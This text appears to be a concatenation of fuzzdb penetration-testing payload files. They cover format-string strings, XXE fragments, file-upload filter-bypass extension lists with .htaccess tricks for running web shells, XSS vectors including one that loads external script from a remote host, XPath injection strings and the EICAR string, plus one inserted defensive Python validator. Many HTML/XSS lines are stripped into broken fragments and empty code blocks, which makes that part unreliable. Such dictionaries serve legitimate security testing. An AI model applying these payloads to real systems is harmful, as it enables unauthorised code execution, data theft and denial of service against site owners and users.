\ ?* %20 %00 %2f %5c count(/child::node()) x' or name()='username' or 'x'='y var n=0;while(true){n++;}]]> SCRIPT]]>alert('XSS');/SCRIPT]]> "SCRIPT]]>alert('XSS');/SCRIPT]]>" "" "]>&xxe;" "]>&xxe;" "]>&xxe;" "]>&xxe;" "]]>" "cript:alert('XSS')"">" "" "XSS" %00 NULL null ' " ; "> %0d %0a %7f %ff -1 other %s%p%x%d %99999999999s %08x %20d %20n %20x %20s %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s 
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% XXXXX.%p XXXXX`perl -e 'print ".%p" x 80'` `perl -e 'print ".%p" x 80'`%n ================================================ FILE: attack/all-attacks/all-attacks-xplatform.txt ================================================ !' !@#$%%^#$%#$@#$%$$@#$%^^**(() !@#0%^#0##018387@#0^^**(() "><"test@address.com a"b(c)d,e:f;gi[j\k]l@example.com this is"not\allowed@example.com notallowed@example.com notallowed@example.com ================================================ FILE: attack/email/valid-email-addresses.txt ================================================ email@eaddress.com firstname.lastname@address.com email@subdomain.address.com firstname+lastname@address.com name@129.129.129.129 name@[129.129.129.129] 0123456789@address.com email@address-one.com email@address.name email@address.co.jp firstname-lastname@address.com much."more\ unusual"@address.com very.unusual."@".unusual.com@address.com very."(),:;<>[]".VERY."very@\\ "very".unusual@strange.address.com abcdefghijklmnopqrstuvwxyz!#$%&'*+-/=?^_`{|}~.0123456789@abcdefghijklmnopqrstuvwxyz-ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789.com {jacco'vantuijl}@address.server "Jacco\@test"@address.com "Jacco van Tuijl"@address.com "Jacco\\test"@address.com "Jacco@test"@address.com Jacco/van=Tuijl@address.com \$A12345@address.com !def!abc%dfg@address.com _jacco@address.com a.long.email.address.test@dept.address.com "jacco.vantuijl.@.address.com"@address.com jacco@mailserver1 #!$%&'*+-/=?^_`{}|~@address.org "()<>[]:,;@\\\"!#$%&'*+-/=?^_`{}| ~.a"@address.org " "@address.org üñîçøðé@address.com address@üñîçøðé.com üñîçøðé@üñîçøðé.com ================================================ FILE: attack/file-upload/README.md ================================================ File Upload Fuzzfiles- File Name Filter Bypass Notes see: http://cwe.mitre.org/data/definitions/434.html * 
kinds of file upload verifications:

* content-type
* filename extension verification (whitelist, blacklist)
* file content checking
* client side, ha ha ha

File notes:

**alt-extensions-asp.fuzz.txt**
**alt-extensions-coldfusion.fuzz.txt**
**alt-extensions-jsp.fuzz.txt**
**alt-extensions-perl.fuzz.txt**
**alt-extensions-php.fuzz.txt**

Alternative ways of expressing file extensions that will be interpreted correctly by the target filesystem/app and can be used to bypass blacklist filters.

**file-ul-filter-bypass-commonly-writable-directories.fuzz.txt**

File directory names that experience has shown are often writable.

**file-ul-filter-bypass-microsoft-asp-filetype-bf.fuzz.txt**

`{ASPSCRIPT}` gets regex replaced with the shell or other file you are trying to upload; `{EXT}` should be brute-forced with payloads from discovery/filename-bruteforce/file-extensions/, since some file upload types may be allowed that are not listed.

**file-ul-filter-bypass-microsoft-asp.fuzz.txt**

This file contains a number of common predictable values. Add more if other file types are allowed, or use the filetype-bf version of this fuzzfile. `{ASPSCRIPT}` gets regex replaced.

**file-ul-filter-bypass-ms-php.fuzz.txt**
**file-ul-filter-bypass-x-platform-php.fuzz.txt**

PHP on Microsoft, cross-platform. Use both on MS.
Use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/ to create a .jpg image with the meta comment field set to:

```
```

then regex replace `{PHPSCRIPT}` in the fuzzfile payload with the name of your .jpg file in the target directory.
**invalid-filenames-microsoft.fuzz.txt**

Useful for causing error messages that contain an absolute drive path, such as if you don't know where the file uploader puts files. Regex replace `{EXT}` with an allowed extension type.

**file-ul-filter-bypass-x-platform-generic.fuzz.txt**

These might bypass a file upload blacklist but be written in a way that leaves them executable because of the filetype. Regex replace `{PHPSCRIPT}` with your script name.
**invalid-filenames-linux.fuzz.txt**
invalid filenames under linux, and since there aren't too many of those (there's one), other filepaths that may cause problems. these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing.
**invalid-filesystem-chars-microsoft.fuzz.txt**
list of invalid characters for windows filesystem - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing. fuzz these into a filename during upload attempts
**Addtl Tips:**

**For mod_cgi Server Side Include upload attacks:**

```
```

or, on Windows

```
```

Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, if so, try setting jpg mimetype handler to executable. If you can set the target directory, try to fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.

**example .htaccess entry that sets mime type .jpg to be executable:**

```
AddType application/x-httpd-php .jpg
```

**Encoding Web Shells in PNG IDAT chunks**
https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
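The verification kinds and filename tricks these notes describe, seen from the validating side: an added example (not fuzzdb's own code) that puts a naive last-extension blacklist beside a hardened allow-list check and replays constructed names in the style of these fuzzfiles against both. The extension allow-list and the application it guards are assumptions.

```python
from typing import Dict, Optional, Tuple
from urllib.parse import unquote

# Added example, not fuzzdb's own code: a hardened upload-name check that turns
# the tricks in the file-upload fuzzfiles (null bytes, trailing dots/spaces,
# ';' and '::$DATA' suffixes, mixed case, double extensions, reserved names)
# into rejections, shown beside the naive blacklist those fuzzfiles defeat.

# Allow-list of extensions this (hypothetical) application stores.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf"}

# Windows reserved device names, as listed in invalid-filenames-microsoft.txt.
RESERVED_NAMES = (
    {"CON", "PRN", "AUX", "NUL", "CLOCK$"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)

# Path separators, the NTFS stream separator ':', the ';' that older IIS treated
# as an extension terminator, and the Windows-illegal set from the fuzzfiles.
FORBIDDEN_CHARS = set('/\\:;*?"<>|=,[]')


def naive_is_allowed(filename: str) -> bool:
    """Blacklist on whatever follows the last dot, no decoding, no
    normalisation: the kind of filter the fuzzfiles are built to defeat."""
    blacklist = {"php", "phtml", "asp", "aspx", "jsp", "cgi", "pl"}
    ext = filename.rsplit(".", 1)[1] if "." in filename else ""
    return ext not in blacklist


def safe_extension(filename: str) -> Optional[str]:
    """Return the canonical extension to store the upload under, or None if
    the client-supplied name must be rejected.  The caller is expected to
    store the file as <server-generated-id>.<ext>, never under the client name."""
    # The fuzzfiles are written percent-encoded; decode exactly one layer.
    name = unquote(filename)
    # If a second decode still changes the string, it was double-encoded
    # (e.g. %2500 -> %00 -> NUL) and is rejected outright.
    if unquote(name) != name:
        return None
    # NUL, CR, LF, DEL and other control characters are never legitimate.
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in name):
        return None
    if any(c in FORBIDDEN_CHARS for c in name):
        return None
    # Windows silently strips trailing dots and spaces, so "x.php   ... . .."
    # is stored as "x.php"; strip them before looking at the extension.
    name = name.rstrip(" .")
    stem, dot, ext = name.rpartition(".")
    # No extension, a dotfile such as .htaccess, or "." / ".." after stripping.
    if not dot or not stem:
        return None
    # A second dot in the stem means a double extension ("shell.php.jpg",
    # "shell.php.rar"); a handler keyed on an inner extension could execute it.
    if "." in stem:
        return None
    if stem.upper() in RESERVED_NAMES:
        return None
    ext = ext.lower()  # pHp, aSp, JPG -> one canonical form
    return ext if ext in ALLOWED_EXTENSIONS else None


def check_many(names) -> Dict[str, Tuple[bool, Optional[str]]]:
    """Run both checks over a list of candidate names; handy for replaying a
    fuzzfile against the validator before it ships."""
    return {n: (naive_is_allowed(n), safe_extension(n)) for n in names}


if __name__ == "__main__":
    # Constructed sample: "shell" plus entries in the style of the fuzzfiles.
    SAMPLE = [
        "photo.JPG", "report.pdf", "shell.php", "shell.pHp", "shell.phtml",
        "shell.php%00.jpg", "shell.asp;.jpg", "shell.php::$DATA",
        "shell.php%20%20%20...%20.%20..", "shell.php.jpg", "shell.php.rar",
        "CON.jpg", "..\\..\\boot.ini", "%00index.html", ".htaccess",
    ]
    for name, (naive, hardened) in check_many(SAMPLE).items():
        verdict = "pass" if naive else "block"
        print(f"{name:36} naive={verdict:5} hardened={hardened}")
```

Running the script prints one line per sample name; every fuzzfile-style name the naive blacklist lets through is rejected by the hardened check, while plain image and PDF names come back with their canonical extension.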
================================================ FILE: attack/file-upload/alt-extensions-asp.txt ================================================ asp aspx asa aSP aSpx aSa asp%20%20%20 aspx%20%20%20 asa%20%20%20 aSP%20%20%20 aSpx%20%20%20 aSa%20%20%20 asp...... aspx...... asa...... aSP...... aSpx...... aSa...... asp%20%20%20...%20.%20.. aspx%20%20%20...%20.%20.. asa%20%20%20...%20.%20.. aSP%20%20%20...%20.%20.. aSpx%20%20%20...%20.%20.. aSa%20%20%20...%20.%20.. asp%00 aspx%00 asa%00 aSp%00 aSpx%00 aSa%00 ================================================ FILE: attack/file-upload/alt-extensions-coldfusion.txt ================================================ cfm cfml cfc dbm cFm cFml cFc dBm cfm%20%20%20 cfml%20%20%20 cfc%20%20%20 dbm%20%20%20 cFm%20%20%20 cFml%20%20%20 cFc%20%20%20 dBm%20%20%20 cfm...... cfml...... cfc....... dbm...... cFm...... cFml...... cFc...... dBm...... cfm%20%20%20...%20.%20.. cfml%20%20%20...%20.%20.. cfc%20%20%20...%20.%20.. dbm%20%20%20...%20.%20.. cFm%20%20%20...%20.%20.. cFml%20%20%20...%20.%20.. cFc%20%20%20...%20.%20.. dBm%20%20%20...%20.%20.. cfm%00 cfml%00 cfc%00 dbm%00 cFm%00 cFml%00 cFc%00 dBm%00 ================================================ FILE: attack/file-upload/alt-extensions-jsp.txt ================================================ jsp jspx jsw jsv jspf jSp jSpx jSw jSv jSpf jSp%00 jSp%20%20%20 jSp%20%20%20...%20.%20..a jSp...... jSpf%00 jSpf%20%20%20 jSpf%20%20%20...%20.%20..a jSpf...... jSpx%00 jSpx%20%20%20 jSpx%20%20%20...%20.%20..a jSpx...... jSv%00 jSv%20%20%20 jSv%20%20%20...%20.%20..a jSv...... jSw%00 jSw%20%20%20 jSw%20%20%20...%20.%20..a jSw...... jsp%00 jsp%20%20%20 jsp%20%20%20...%20.%20..a jsp...... jspf%00 jspf%20%20%20 jspf%20%20%20...%20.%20..a jspf...... jspx%00 jspx%20%20%20 jspx%20%20%20...%20.%20..a jspx...... jsv%00 jsv%20%20%20 jsv%20%20%20...%20.%20..a jsv...... jsw%00 jsw%20%20%20 jsw%20%20%20...%20.%20..a jsw...... 
================================================ FILE: attack/file-upload/alt-extensions-perl.txt ================================================ # .pm .lib cannot be called directly, must be called as modules pl pm cgi pL pM cGi lib lIb cGi%00 cGi%20%20%20 cGi...... cgi%00 cgi%20%20%20 cgi...... lIb%00 lIb%20%20%20 lIb...... lib%00 lib%20%20%20 lib...... pL%00 pL%20%20%20 pL...... pM%00 pM%20%20%20 pM...... pl%00 pl%20%20%20 pl...... pm%00 pm%20%20%20 pm...... ================================================ FILE: attack/file-upload/alt-extensions-php.txt ================================================ phtml php php3 php4 php5 inc pHtml pHp pHp3 pHp4 pHp5 iNc iNc%00 iNc%20%20%20 iNc%20%20%20...%20.%20.. iNc...... inc%00 inc%20%20%20 inc%20%20%20...%20.%20.. inc...... pHp%00 pHp%20%20%20 pHp%20%20%20...%20.%20.. pHp...... pHp3%00 pHp3%20%20%20 pHp3%20%20%20...%20.%20.. pHp3...... pHp4%00 pHp4%20%20%20 pHp4%20%20%20...%20.%20.. pHp4...... pHp5%00 pHp5%20%20%20 pHp5%20%20%20...%20.%20.. pHp5...... pHtml%00 pHtml%20%20%20 pHtml%20%20%20...%20.%20.. pHtml...... php%00 php%20%20%20 php%20%20%20...%20.%20.. php...... php3%00 php3%20%20%20 php3%20%20%20...%20.%20.. php3...... php4%00 php4%20%20%20 php4%20%20%20...%20.%20.. php4...... php5%00 php5%20%20%20 php5%20%20%20...%20.%20.. php5...... phtml%00 phtml%20%20%20 phtml%20%20%20...%20.%20.. phtml...... ================================================ FILE: attack/file-upload/file-ul-filter-bypass-commonly-writable-directories.txt ================================================ templates_compiled templates_c templates temporary images cache temp files tmp ================================================ FILE: attack/file-upload/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt ================================================ {ASPSCRIPT} {ASPSCRIPT}.{EXT} {ASPSCRIPT}; {ASPSCRIPT};.{EXT} {ASPSCRIPT}%00 {ASPSCRIPT}%00.{EXT} {ASPSCRIPT}::data%00. 
{ASPSCRIPT}::data%00.{EXT} ================================================ FILE: attack/file-upload/file-ul-filter-bypass-microsoft-asp.txt ================================================ {ASPSCRIPT} {ASPSCRIPT}; {ASPSCRIPT};.jpg {ASPSCRIPT};.pdf {ASPSCRIPT};.html {ASPSCRIPT};.htm {ASPSCRIPT};.txt {ASPSCRIPT};.xyz {ASPSCRIPT};.zip {ASPSCRIPT};.tgz {ASPSCRIPT};.doc {ASPSCRIPT};.docx {ASPSCRIPT};.xls {ASPSCRIPT};.xlsx {ASPSCRIPT}%00.jpg {ASPSCRIPT}%00.pdf {ASPSCRIPT}%00.html {ASPSCRIPT}%00.txt {ASPSCRIPT}%00.xyz {ASPSCRIPT}%00.tgz {ASPSCRIPT}%00.zip {ASPSCRIPT}%00.doc {ASPSCRIPT}%00.docx {ASPSCRIPT}%00 {ASPSCRIPT}::data%00.jpg {ASPSCRIPT}::data%00.pdf {ASPSCRIPT}::data%00.html {ASPSCRIPT}::data%00.txt {ASPSCRIPT}::data%00.zip {ASPSCRIPT}::data%00.doc {ASPSCRIPT}::data%00.xls {ASPSCRIPT}%00%20%20%20 {ASPSCRIPT}%00%20%20%20...%20.%20.. {ASPSCRIPT}%00...... {ASPSCRIPT}%20%20%20 {ASPSCRIPT}%20%20%20...%20.%20.. {ASPSCRIPT}...... {ASPSCRIPT}::data%00%%20%20%20 {ASPSCRIPT}::data%00%%20%20%20...%20.%20.. {ASPSCRIPT}::data%00%...... 
{ASPSCRIPT}%00%20%20%20;.jpg {ASPSCRIPT}%00%20%20%20;.doc {ASPSCRIPT}%00%20%20%20...%20.%20..;.jpg {ASPSCRIPT}%00%20%20%20...%20.%20..;.doc {ASPSCRIPT}%00......;.jpg {ASPSCRIPT}%00......;.doc {ASPSCRIPT}%20%20%20;.jpg {ASPSCRIPT}%20%20%20;.doc {ASPSCRIPT}%20%20%20...%20.%20..;.jpg {ASPSCRIPT}%20%20%20...%20.%20..;.doc {ASPSCRIPT}......;.jpg {ASPSCRIPT}......;.doc {ASPSCRIPT}::data%00%%20%20%20;.jpg {ASPSCRIPT}::data%00%%20%20%20;.doc {ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.jpg {ASPSCRIPT}::data%00%%20%20%20...%20.%20..;.doc {ASPSCRIPT}::data%00%......;.jpg {ASPSCRIPT}::data%00%......;.doc ================================================ FILE: attack/file-upload/file-ul-filter-bypass-ms-php.txt ================================================ {PHPSCRIPT} {PHPSCRIPT}.phtml {PHPSCRIPT}.php.html {PHPSCRIPT}.php::$DATA {PHPSCRIPT}.php.php.rar {PHPSCRIPT}.php.rar {PHPSCRIPT}::$DATA ================================================ FILE: attack/file-upload/file-ul-filter-bypass-x-platform-generic.txt ================================================ %00index.html ;index.html %00 ================================================ FILE: attack/file-upload/file-ul-filter-bypass-x-platform-php.txt ================================================ {PHPSCRIPT} {PHPSCRIPT}.phtml {PHPSCRIPT}.php.html {PHPSCRIPT}.php.php.rar {PHPSCRIPT}.php.rar ================================================ FILE: attack/file-upload/invalid-filenames-linux.txt ================================================ / \0 /dev/null /dev/null/foo . .. 
================================================ FILE: attack/file-upload/invalid-filenames-microsoft.txt ================================================ A: ZZ: CON PRN AUX CLOCK$ NUL COM1 COM2 COM3 COM4 COM5 COM6 COM7 COM8 COM9 LPT1 LPT2 LPT3 LPT4 LPT5 LPT6 LPT7 LPT8 LPT9 * " [ ] : | = , CON.{EXT} PRN.{EXT} AUX.{EXT} CLOCK$.{EXT} NUL.{EXT} COM1.{EXT} COM2.{EXT} COM3.{EXT} COM4.{EXT} COM5.{EXT} COM6.{EXT} COM7.{EXT} COM8.{EXT} COM9.{EXT} LPT1.{EXT} LPT2.{EXT} LPT3.{EXT} LPT4.{EXT} LPT5.{EXT} LPT6.{EXT} LPT7.{EXT} LPT8.{EXT} LPT9.{EXT} *.{EXT} ".{EXT} [.{EXT} ].{EXT} :.{EXT} |.{EXT} =.{EXT} ,.{EXT} ================================================ FILE: attack/file-upload/invalid-filesystem-chars-microsoft.txt ================================================ * . " / \ [ ] : ; | = , ================================================ FILE: attack/file-upload/invalid-filesystem-chars-osx.txt ================================================ # list of invalid characters for osx - these can be used to attempt to cause an error condition during file upload bypass attempts which might reveal an absolute path. Useful if you're not sure where your files are landing. # fuzz these into a filename during upload attempts : ================================================ FILE: attack/file-upload/malicious-images/README.md ================================================ From SecLists: ## lottapixel Originally reported at https://hackerone.com/reports/390, addressed on paperclip. A specially crafted JPEG (the original file was named lottapixel.jpg) causes attempts to determine the dimensions of the image to exhaust available memory. From the original report: The exploit is really simple. I have an image of 5kb, 260x260 pixels. In the image itself I exchange the 260x260 values with 0xfafa x 0xfafa (so 64250x64250 pixels). Now from what I remember your service tries to convert the image once uploaded. 
By loading the 'whole image' into memory, it tries to allocate 4128062500 pixels into memory, flooding the memory and causing DoS.

## uber.gif

Current limits

Image size: 1 MB
Image dimensions: 2048x2048px
File types: jpg/png/gif

Another image hack

A GIF composed of 40k 1x1 images made Paperclip freeze until timeout. As attachments I sent the file composed of 40k images, and a screenshot of the timeout.

## EICAR File

The EICAR Standard Anti-Virus Test File or EICAR test file is a computer file that was developed by the European Institute for Computer Antivirus Research (EICAR) and Computer Antivirus Research Organization (CARO), to test the response of computer antivirus (AV) programs. Instead of using real malware, which could do real damage, this test file allows people to test anti-virus software without having to use a real computer virus.

Anti-virus programmers set the EICAR string as a verified virus, similar to other identified signatures. A compliant virus scanner, when detecting the file, will respond in exactly the same manner as if it found a harmful virus. Not all virus scanners are compliant, and may not detect the file even when they are correctly configured. The use of the EICAR test string can be more versatile than straightforward detection: a file containing the EICAR test string can be compressed or archived, and then the antivirus software can be run to see whether it can detect the test string in the compressed file.

## xssproject File

As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs. This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
Examples: Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); ## POC_img_phpinfo File Outlined here: https://www.secgeek.net/bookfresh-vulnerability/ ================================================ FILE: attack/file-upload/malicious-images/eicar.com.txt ================================================ X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* ================================================ FILE: attack/format-strings/format-strings.txt ================================================ %s%p%x%d %p%p%p%p %x%x%x%x %d%d%d%d %s%s%s%s %99999999999s %08x %20d %20n %20x %20s %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e 
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% XXXXX.%p XXXXX`perl -e 'print ".%p" x 80'` `perl -e 'print ".%p" x 80'`%n %08x.%08x.%08x.%08x.%08x\n XXX0_%08x.%08x.%08x.%08x.%08x\n %.16705u%2\$hn \x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s| AAAAA%c AAAAA%d AAAAA%e AAAAA%f AAAAA%I AAAAA%o AAAAA%p AAAAA%s AAAAA%x AAAAA%n ppppp%c ppppp%d ppppp%e ppppp%f ppppp%I ppppp%o ppppp%p ppppp%s ppppp%x ppppp%n %@ %@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@ %* %*p %*x %*s %*S %*$* %*$*p %*$*x %*$*s %*$*S ================================================ FILE: attack/html_js_fuzz/HTML5sec_Injections.txt ================================================

&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi &alert&A7&(1)&R&UA;&&<&A9&11/script&X&> 0? :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk')) X





...



01 X ¼script ¾alert(1)//¼/script ¾
1 ;1 +ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input); 1 @import "data:,*%7bx:expression(write(1))%7D";
XXXXXX 1 1 XXX ><image xlink:href="
  • XXX Hello X
    XXX
    XXX
    " "]]>" "" $ % 'XoiZR <% Tnn96 %> <%= Tnn96 %> <? Tnn96 ?> <?Tnn96 ?> <Tnn96> "XoiZR (Tnn96) * */* / // //* : ; @ @* [Tnn96] ]> {{= Tnn96}} {{Tnn96}} {= Tnn96} {Tnn96} + SCRIPT]]>alert('XSS');/SCRIPT]]> var n=0;while(true){n++;}]]> ]>&xee; ]>&xee; ]>&xee; ]>&xee; SCRIPT]]>alert('gotcha');/SCRIPT]]> ','')); phpinfo(); exit;/* 0 0.00005 0.1 0.9 1 -1 1.7976931348623157e+308 5e-10 5e-324 count(/child::node()) false null true x' or 1=1 or 'x'='y x' or name()='username' or 'x'='y ================================================ FILE: attack/xpath/README.md ================================================ tool: http://code.google.com/p/xpath-blind-explorer/ video: http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/ ================================================ FILE: attack/xpath/xpath-injection.txt ================================================ ' or '1'='1 ' or ''=' x' or 1=1 or 'x'='y / // //* */* @* count(/child::node()) x' or name()='username' or 'x'='y ' and count(/*)=1 and '1'='1 ' and count(/@*)=1 and '1'='1 ' and count(/comment())=1 and '1'='1 ================================================ FILE: attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt ================================================ A very short cross browser header injection Exploit Name: A very short cross browser header injection Exploit String: with(document)getElementsByTagName('head')[0].appendChild(createElement('script')).src='//ŋ.ws' Exploit Description: This vector shows one of the shortest possible ways to inject external JavaScript into a website's header area. Exploit Tags: xss, short, header, injection Author Name: .mario Add onclick event hadler Exploit Name: Add onclick event hadler Exploit String: onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source); Exploit Description: This vector adds an onclick event handler to a tag and appends an obfuscated JS alert. 
